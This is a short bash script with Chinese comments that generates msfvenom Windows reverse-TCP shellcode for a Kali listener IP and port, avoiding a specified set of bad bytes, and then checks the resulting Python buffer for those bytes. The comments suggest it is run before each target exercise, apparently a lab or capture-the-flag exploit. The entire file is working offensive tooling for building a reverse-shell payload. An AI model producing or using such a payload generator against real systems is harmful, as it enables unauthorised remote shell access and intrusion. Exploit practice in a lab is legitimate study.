#!/bin/bash # gen_sc.sh - 生成 msfvenom shellcode # 每次打靶前执行一次(IP 可能变化) KALI_IP="${1:-192.168.1.113}" KALI_PORT="${2:-4444}" echo "[*] Generating shellcode for ${KALI_IP}:${KALI_PORT}" msfvenom -p windows/shell_reverse_tcp \ LHOST="${KALI_IP}" LPORT="${KALI_PORT}" \ -b '\x00\x4d\x4f\x5f\x79\x7e\x7f' \ -f py EXITFUNC=thread \ > /tmp/sc_final.py 2>/dev/null # 验证 python3 -c " import sys; sys.path.insert(0,'/tmp'); from sc_final import buf BAD = {0x00, 0x4d, 0x4f, 0x5f, 0x79, 0x7e, 0x7f} bad = [(i,b) for i,b in enumerate(buf) if b in BAD] print(f'Shellcode: {len(buf)} bytes') print(f'Bad bytes: {len(bad)}') print('CLEAN!' if not bad else f'HAS BAD BYTES: {bad[:5]}') "